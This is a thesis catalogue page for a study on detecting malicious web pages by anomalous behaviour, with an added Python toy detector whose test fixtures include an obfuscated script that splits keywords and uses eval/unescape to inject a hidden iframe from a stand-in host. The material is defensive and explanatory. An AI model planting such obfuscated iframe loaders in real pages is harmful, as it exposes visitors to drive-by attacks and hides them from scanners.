Master's and Doctoral Theses: title page for etd-0204109-163602
Title: Malicious Web Page Detection Based on Anomaly Behavior (Chinese title 以異常行為偵測惡意網頁之研究, "A Study of Detecting Malicious Web Pages by Anomalous Behavior")
Department:
Year, semester:
Language:
Degree:
Number of pages: 63
Author:
Advisor:
Convenor:
Advisory Committee:
Date of Exam: 2008-07-25
Date of Submission: 2009-02-04
Keywords: drive-by download, malicious web page, anomaly behavior
Statistics: this thesis has been browsed 5847 times and downloaded 10 times.
Abstract
Because of the convenience and variety of Internet applications, people rely heavily on the Internet for information searching and sharing, forum discussion, and online services. However, most of the websites we visit are built by engineers with limited security knowledge, which leaves many vulnerabilities in web applications. Attackers exploit these vulnerabilities to inject malicious JavaScript into compromised web pages, where it waits for a visitor to trigger a drive-by download attack.
Based on our long-term observation of malicious web pages, they exhibit unusual behavior, such as encoding the whole page or splitting sensitive keywords, in order to evade antivirus detection; this makes malicious pages differ markedly from normal ones at the behavioral level. We therefore propose a client-side malicious web page detection mechanism named Web Page Checker (WPC), which traces and analyzes anomalous behavior to identify malicious web pages. The experimental results show that our method can effectively identify malicious web pages and warn website visitors in time, confirming that anomaly behavior detection can serve as a new approach to malicious web page detection.
Table of Contents
Chapter 1 Introduction
1.1 Background
1.2 Motivation
Chapter 2 Related Work
2.1 Malicious Code Injection Mechanisms
2.1.1 Web Server Security
2.1.2 User-Contributed Content
2.1.3 Advertisement
2.1.4 Third-Party Widgets
2.2 Malicious Code Obfuscation Techniques
2.2.1 Code Reordering
2.2.2 Junk Instruction Insertion
2.2.3 Equivalent Code Replacement
2.2.4 Code and Data Encapsulation
2.2.5 String Splitting
2.3 Malicious Code Detection Research
2.3.1 Types of Injected Malicious Code
2.3.2 Related Research
2.3.3 Brief Conclusion
Chapter 3 The Proposed Approach
3.1 Introduction to Anomaly Behavior and the Detection Approach
3.1.1 Deeper Depth
3.1.2 Web Page Encoding
3.1.3 Sensitive Keyword Splitting
3.1.4 Sensitive Keyword Encoding
3.1.5 Unreasonable Coding Styles
3.1.6 Redirection
3.2 Proposed System Architecture and System Flowchart
3.3 Detailed Illustration of System Modules
3.3.1 Web Page URL Extraction Module
3.3.2 Web Page Crawler Module
3.3.3 Behavior Extraction Module
3.3.3.1 Web Page Encoding Detection
3.3.3.2 Sensitive Keyword Splitting Detection
3.3.3.3 Sensitive Keyword Encoding Detection
3.3.3.4 Unreasonable Coding Style Detection
3.3.3.5 Redirection Detection
3.4 MoBR Module
3.5 Anomaly Behavior Scoring Module
3.5.1 Predictor Variables of the Behavior Scoring Formula
3.5.2 Weight Variables of the Behavior Scoring Formula
3.5.3 Target Variable of the Behavior Scoring Formula
Chapter 4 System Implementation and Experiment Design
4.1 System Implementation
4.2 Experiment Design
4.2.1 Sample Collection
4.2.2 Sampling and Experiment
4.3 Experiment Results
4.4 Comparisons
Chapter 5 Conclusions and Future Work
5.1 Conclusions
5.2 Future Work
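The abstract and the outline of sections 3.1 and 3.3.3 describe the kind of anomalous behavior WPC looks for (web page encoding, sensitive keyword splitting, sensitive keyword encoding, redirection) and a weighted scoring step. The following is an added illustration of that idea and is not code from the thesis or from the WPC implementation: it runs simplified versions of those checks over two constructed pages, decodes the layered escapes a loader typically stacks before looking for keywords, and combines the flags with assumed weights and an assumed threshold. The keyword list, the weights, the threshold, the hidden-iframe rule and the sample pages are all assumptions made for this example and are not the thesis's scoring formula.

```python
"""Toy anomaly-behaviour checker (added example, not the thesis's WPC)."""
import re
from urllib.parse import unquote

# Assumed keyword list: things a drive-by loader needs and a normal page rarely hides.
SENSITIVE = ("document.write", "eval", "unescape", "iframe",
             "activexobject", "fromcharcode", "location")
# Assumed weights and threshold: evasion signals count more than a bare redirect.
WEIGHTS = {"page_encoding": 3, "keyword_splitting": 2, "keyword_encoding": 3,
           "redirection": 1, "hidden_iframe": 2}
THRESHOLD = 4

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
LIT = r"""(?:"[^"\\\n]*"|'[^'\\\n]*')"""            # one single-line string literal
LIT_RE = re.compile(LIT)
CHAIN_RE = re.compile(rf"{LIT}(?:\s*\+\s*{LIT})+")   # "a" + "b" + ...
ESCAPE_RE = re.compile(r"%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
DECODER_RE = re.compile(r"\b(eval|unescape|fromCharCode|decodeURIComponent)\b")
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|%u([0-9a-fA-F]{4})")
FCC_RE = re.compile(r"(?:String\.)?fromCharCode\s*\(([^)]*)\)", re.I)
REDIRECT_RE = re.compile(
    r"""<meta\b[^>]*http-equiv\s*=\s*["']?refresh"""
    r"""|(?:window\.|document\.|top\.|self\.)?location(?:\.href|\.replace\s*\(|\s*=)""", re.I)
HIDDEN_IFRAME_RE = re.compile(
    r"""<iframe\b[^>]*(?:width\s*=\s*["']?0|height\s*=\s*["']?0"""
    r"""|display\s*:\s*none|visibility\s*:\s*hidden)""", re.I)


def has_keyword(keyword, text):
    """Whole-token match on lower-cased text, so 'retrieval' does not count as 'eval'."""
    pattern = r"(?<![a-z0-9_])" + re.escape(keyword) + r"(?![a-z0-9_])"
    return re.search(pattern, text.lower()) is not None


def decode_layers(text):
    """Peel the encodings loaders stack: %XX and %uXXXX (JS unescape),
    \\xXX and \\uXXXX string escapes, and String.fromCharCode(n, n, ...)."""
    out = unquote(text)
    out = HEX_ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2) or m.group(3), 16)), out)
    out = FCC_RE.sub(lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))
                                       if int(n) <= 0x10FFFF), out)
    return out


def split_keywords(script):
    """Keywords that exist only once adjacent string literals are concatenated."""
    found = set()
    for chain in CHAIN_RE.findall(script):
        parts = [lit[1:-1] for lit in LIT_RE.findall(chain)]
        joined = "".join(parts)
        for k in SENSITIVE:
            if has_keyword(k, joined) and not any(has_keyword(k, p) for p in parts):
                found.add(k)
    return found


def analyze(html):
    """Return one entry per anomaly behaviour; truthy means the behaviour was seen."""
    scripts = SCRIPT_RE.findall(html)
    body = "\n".join(scripts)
    decoded = decode_layers(body)
    surface = html + "\n" + decoded   # redirects and iframes may only appear after decoding
    return {
        # many escape sequences plus a decoder call: the page carries itself encoded
        "page_encoding": any(len(ESCAPE_RE.findall(s)) >= 10 and DECODER_RE.search(s)
                             for s in scripts),
        "keyword_splitting": sorted(split_keywords(body)),
        # keyword visible only after decoding and never in the raw page
        "keyword_encoding": sorted(k for k in SENSITIVE
                                   if has_keyword(k, decoded) and not has_keyword(k, html)),
        "redirection": REDIRECT_RE.search(surface) is not None,
        "hidden_iframe": HIDDEN_IFRAME_RE.search(surface) is not None,
    }


def score(html):
    """Weighted sum of the flags: (score, flagged_as_malicious)."""
    findings = analyze(html)
    total = sum(WEIGHTS[k] for k, v in findings.items() if v)
    return total, total >= THRESHOLD


# Constructed sample pages (not real sites): a shop page, a page carrying an
# encoded loader that injects a hidden iframe, and a page that only redirects.
BENIGN = """<html><head><title>Shop</title>
<script src="/static/app.js"></script>
<script>
  var cart = [];
  function add(item) { cart.push(item); document.getElementById("n").innerText = cart.length; }
</script></head>
<body><iframe src="https://maps.example.com/embed" width="400" height="300"></iframe></body></html>"""

MALICIOUS = """<html><body><p>Welcome to our blog</p>
<script>
var ax = "Acti" + "veXOb" + "ject";
var p = "%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example%2Fl.html%22%20" +
        "width%3D0%20height%3D0%3E%3C%2Fiframe%3E";
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65") + "(unescape(p))");
</script>
</body></html>"""

REDIRECT_ONLY = """<html><head><meta http-equiv="refresh" content="0;url=https://www.example.com/new">
</head><body>Moved.</body></html>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN), ("malicious", MALICIOUS), ("redirect", REDIRECT_ONLY)):
        print(name, score(page), analyze(page))
```

The point of decoding before matching is that the keyword checks are run on what the browser would execute, not on the bytes a signature scanner sees; the redirect-only page scores below the threshold on purpose, since a single weak signal is common on benign sites and only the combination of evasion behaviours should raise an alarm.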

Fulltext
This electronic full text is licensed to users only for personal, non-profit retrieval, reading and printing for the purpose of academic research. Please comply with the Copyright Act of the Republic of China (Taiwan); do not reproduce, distribute, adapt, repost or broadcast it, to avoid infringement.
Thesis access permission: open on campus after one year; never open off campus (campus withheld)
Available:
Campus: available
Off-campus: not available


Printed copies
Public-access information for printed theses is relatively complete from academic year 102 (ROC calendar, i.e. 2013) onward. For printed theses from academic year 101 (2012) or earlier, please contact the printed thesis service counter of the Office of Library and Information Services. We apologize for any inconvenience.
Available: available
